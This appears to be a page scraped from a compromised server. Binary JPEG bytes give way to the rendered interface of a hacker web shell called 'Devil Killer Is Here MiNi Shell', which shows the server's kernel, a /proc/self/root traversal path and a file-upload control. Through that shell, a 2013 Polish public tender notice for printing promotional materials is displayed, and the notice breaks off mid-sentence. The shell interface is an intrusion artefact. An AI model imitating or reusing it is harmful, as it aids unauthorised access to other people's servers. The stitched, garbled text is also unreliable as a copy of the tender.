JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130313/38145-N-2013.html

<p class="kh_header"><b>Warszawa: Druk oraz dostawa drukowanych materiałów promocyjnych z logo Urzędu Dozoru Technicznego</b><br>
<b>Numer ogłoszenia: 38145 - 2013; data zamieszczenia: 13.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Dozoru Technicznego , ul. Szczęśliwicka 34, 02-353 Warszawa, woj. mazowieckie, tel. 022 5722100, faks 022 5722388.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.udt.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk oraz dostawa drukowanych materiałów promocyjnych z logo Urzędu Dozoru Technicznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywna dostawa druków i materiałów promocyjnych dla Urzędu Dozoru Technicznego, CLDT oraz Oddziałów UDT, opisanych szczegółowo w Załączniku Nr 8 do SIWZ, stanowiącym integralną część umowy.
2.	Szczegółowy opis przedmiotu zamówienia został zawarty w Załączniku Nr 7 do SIWZ, stanowiącym integralną część umowy.
3.	Wzór umowy wraz z załącznikami stanowią Załączniki nr 6-8 do SIWZ.

4.	Dostawy przedmiotu zamówienia będą odbywały się partiami i muszą być zgłoszone przez Wykonawcę właściwej jednostce UDT, do której ma odbyć się dostawa (pocztą elektroniczną, faksem lub telefonicznie) na minimum 3 dni robocze przed datą dostawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 22.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał, a w przypadku świadczeń okresowych również wykonuje , w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną dostawę o wartości co najmniej 300.000,00 PLN brutto odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia, tj. dostawy druków firmowych lub/i akcydensowych lub/i drukowanych materiałów promocyjnych.

Wartość wskazana w wykazie dostaw przez Wykonawcę na potwierdzenie spełnienia ww. warunku musi być zrealizowana w ramach jednej umowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>DOKUMENTY I OŚWIADCZENIA, KTÓRE NALEŻY ZŁOŻYĆ WRAZ Z OFERTĄ:
1) 	Formularz ofertowy z wykorzystaniem wzoru stanowiącego Załącznik Nr 1
do SIWZ,

2)   Formularz cenowy -z wykorzystaniem wzoru stanowiącego odpowiednio Załącznik Nr 2 do SIWZ,

3)	Oświadczenie o powierzeniu / nie powierzeniu prac podwykonawcom z wykorzystaniem wzoru stanowiącego Załącznik Nr 5 do SIWZ.
       W przypadku wskazania podwykonawców, Wykonawca zobowiązany jest załączyć 
do oferty wypełnione i podpisane ww. oświadczenie z zakresem prac, jakie Wykonawca planuje zlecić Podwykonawcy. Brak dołączenia do oferty ww. oświadczenia Zamawiający uzna za potwierdzenie, że Wykonawca wykona całość prac bez udziału podwykonawców.

4)  Listę podmiotów należących do tej samej grupy kapitałowej lub informację, że Wykonawca nie należy do grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), zgodnie z wzorem, stanowiącym Załącznik Nr 11 do SIWZ. Należy złożyć podpisany dokument w formie oryginału.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy, Zamawiający przewiduje możliwość dokonania zmiany  w umowie w następujących przypadkach:
1)	Możliwość zmiany podwykonawcy (jeśli był zgłoszony na etapie postępowania o udzielenie zamówienia publicznego).
2)	Niespodziewanej zmiany cen, która spowoduje, że wykonanie umowy było 
by sprzeczne z jej społeczno-gospodarczym przeznaczeniem lub z zasadami współżycia społecznego.
3)	W przypadku zmiany koordynatorów dostaw zarówno ze strony Wykonawcy, jak 
i Zamawiającego. 
4)	Przedłużenie terminów realizacji dostaw będzie możliwe jedynie za zgodą Zamawiającego, jeżeli Wykonawca zgłosi pisemne uzasadnienie, a opóźnienie nie będzie wynikało z winy Wykonawcy.
5)	Ceny jednostkowe mogą być waloryzowane, za zgodą stron, maksymalnie do poziomu wskaźnika wzrostu cen towarów i usług konsumpcyjnych, ogłaszanego w Monitorze Polskim, nie częściej niż raz na rok i nie wcześniej niż 6 miesięcy od daty zawarcia umowy.
6)	W przypadku zmian cen jednostkowych wynikających ze zwiększenia lub zmniejszenia ilości stron, kolorów, formatów oraz innych zmian we wzorach druków, jeżeli Wykonawca pisemnie uzasadni zwiększenie lub zmniejszenie kosztów produkcji.
7)	W przypadku, gdy zmiana zakresu umowy wynika ze zmian w obowiązujących przepisach, a dokonane zmiany nie spowodują zwiększenia wartości brutto umowy.
8)	W przypadku wykorzystania przez poszczególne jednostki UDT limitów asortymentowych określonych w liście dystrybucyjnej będzie możliwe dokonywanie zakupów w ramach zbiorczego limitu na dany asortyment.
9)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami; 
10)	 Ilości poszczególnych rodzajów druków będą mogły ulec zmianie pod warunkiem, że dokonane zmiany nie spowodują zwiększenia wartości brutto umowy.
11)	zmiana obowiązującej stawki VAT; Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę.
12)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
a)	wstrzymanie realizacji umowy przez Zamawiającego;
b)	konieczność usunięcia błędów lub wprowadzenia zmian w opisie przedmiotu zamówienia. 
Wszystkie postanowienia, o których mowa powyżej, stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.udt.gov.pl, zakładka: zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1) ze strony internetowej
Zamawiającego: www.udt.gov.pl - bezpłatnie, 2) odpłatnie - 16,00 zł za zaliczeniem pocztowym lub w kasie
UDT + koszt przesyłki za pobraniem..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2013 godzina 12:00, miejsce: Urząd Dozoru Technicznego
ul. Szczęśliwicka 34
02-353 Warszawa, pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Niniejsze postępowanie o udzielenie zamówienia publicznego jest prowadzone w trybie przetargu nieograniczonego na podstawie przepisów ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113 poz. 759 ze zm.), zwanej w niniejszym ogłoszeniu ustawą. 2. Zamawiający nie zamierza zawierać umowy ramowej 3. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów w przedmiotowym postępowaniu. 4. W związku z niedostosowaniem aktualnie obwiązującego Rozporządzenia Prezesa Rady Ministrów z dnia 28 stycznia 2010 r. w sprawie wzorów ogłoszeń zamieszczanych w Biuletynie Zamówień Publicznych do aktualnego Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane, pozycja III.4) niniejszego ogłoszenia o zamówieniu otrzymuje brzmienie: III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY III.4.1) 
1.    Wykonawcy wraz z ofertą składają:
W CELU WYKAZANIE BRAKU PODSTAW DO WYKLUCZENIA Z POSTĘPOWANIA NA PODSTAWIE ART. 24 UST. 1:
1)	Oświadczenie, o braku podstaw do wykluczenia z powodu niespełnienia warunków, 
o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych - wzór stanowi Załącznik Nr 10 do SIWZ;
2)	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
3)	Listę podmiotów należących do tej samej grupy kapitałowej lub informację, że Wykonawca nie należy do grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), zgodnie z wzorem, stanowiącym Załącznik Nr 11 do SIWZ. Należy złożyć podpisany dokument w formie oryginału.

WYMAGANE DOKUMENTY NA POTWIERDZENIE WARUNKÓW UDZIAŁU 
W POSTĘPOWANIU:
4)	Oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych - stanowiącym Załącznik Nr 3 do SIWZ;
5)	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Wykaz powinien być sporządzony zgodnie ze wzorem określonym odpowiednio w Załączniku nr 4 do SIWZ.
Dowodami, o których mowa są:
a)	poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert;
b)	oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w ppkt a).
W postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. (Dz. U. z 2013 r. poz. 231), wykonawca, w miejsce poświadczeń, o których mowa w pkt 1 ppkt 5 lit. a), może przedkładać dokumenty potwierdzające należyte wykonanie dostaw lub usług oraz wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt 2 i 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego dostawy lub usługi wskazane w wykazie, o którym mowa w pkt 1 ppkt 5), zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 1 ppkt 5) lit. a) i b).
W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa odpowiednio w pkt 1 ppkt 5), budzą wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego dostawy lub usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.

Uwaga:
           Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na wiedzy 
i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących 
go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (wzór - Załącznik nr 9 do SIWZ).

INNE DOKUMENTY I OŚWIADCZENIA, KTÓRE NALEŻY ZŁOŻYĆ WRAZ Z OFERTĄ:
6)	Formularz ofertowy - z wykorzystaniem wzoru stanowiącego Załącznik Nr 1
do SIWZ,
7)	Formularz cenowy - z wykorzystaniem wzoru stanowiącego odpowiednio Załącznik 
Nr 2 do SIWZ,	
8)	Oświadczenie o powierzeniu / nie powierzeniu prac podwykonawcom 
z wykorzystaniem wzoru stanowiącego Załącznik Nr 5 do SIWZ.
W przypadku wskazania podwykonawców, Wykonawca zobowiązany jest załączyć 
do oferty wypełnione i podpisane ww. oświadczenie z zakresem prac, jakie Wykonawca planuje zlecić Podwykonawcy. Brak dołączenia do oferty ww. oświadczenia Zamawiający uzna za potwierdzenie, że Wykonawca wykona całość prac bez udziału podwykonawców.

2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 ppkt 2) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę 
lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
3.	Dokumenty, o których mowa w ust. 2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę
lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 3 stosuje się odpowiednio.
5.	Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez Wykonawcę (osobę uprawnioną do podpisania oferty).
6.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
7.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
8.	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy nie złożyli pełnomocnictw
albo, którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy lub, którzy złożyli wadliwe pełnomocnictwa, do ich złożenia
w wyznaczonym terminie, chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone
na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu nie później niż w dniu, w którym upłynął termin składania ofert. 
9.	Zamawiający może żądać, w wyznaczonym przez siebie terminie wyjaśnień dotyczących przedstawionych przez Wykonawców dokumentów lub oświadczeń.

10.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku:
1)	W przypadku składania oferty przez podmioty występujące wspólnie (konsorcja), wymóg złożenia dokumentów, o których mowa w pkt 1 ppkt 2) i 3)- dotyczy każdego
z podmiotów. Pozostałe dokumenty Wykonawcy mogą złożyć odrębnie lub wspólnie. Dokumenty te będą rozpatrywane łącznie;
2)	Zamawiający dopuszcza, aby oświadczenie o spełnianiu warunków udziału
w postępowaniu, zgodnie z wzorem stanowiącym Załącznik 3 do SIWZ zostało złożone przez pełnomocnika w imieniu Wykonawców wspólnie występujących w postępowaniu.
3)	Nie dopuszcza się uczestniczenia danego Wykonawcy w więcej niż jednej grupie wspólnie biorących udział w postępowaniu Wykonawców.
4)	Niedopuszczalnym również jest złożenie przez jednego Wykonawcę równocześnie oferty indywidualnej oraz w ramach grupy wspólnie występujących w postępowaniu Wykonawców.
5)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiotów trzecich kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty.
6)	Oferta składana wspólnie musi być podpisana przez przedstawiciela upoważnionego przez wszystkich występujących wspólnie uczestników postępowania lub musi być podpisana przez każdego uczestnika występującego wspólnie.
7)	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.
8)	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera)
do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia
albo do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Jeżeli oferta tych Wykonawców zostanie wybrana, Zamawiający żąda przed zawarciem umowy, umowy regulującej współprace tych Wykonawców.
Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
9)	Wszelka korespondencja oraz rozliczenia na etapie postępowania dokonywane będą wyłącznie z pełnomocnikiem (liderem);
10)	Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się
na Wykonawcę; w miejscu np. nazwa i adres Wykonawcy należy wpisać dane dotyczące podmiotów występujących wspólnie.


11. Zabezpieczenie należytego wykonania umowy:
     Ustala się zabezpieczenie należytego wykonania umowy w wysokości: 5 % ceny całkowitej podanej w ofercie. 
      1)	 Wykonawca wnosi zabezpieczenie w jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
2)	Zabezpieczenie należytego wykonania umowy wnoszone w formie pieniężnej Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego, prowadzony przez Bank Gospodarstwa Krajowego o numerze:
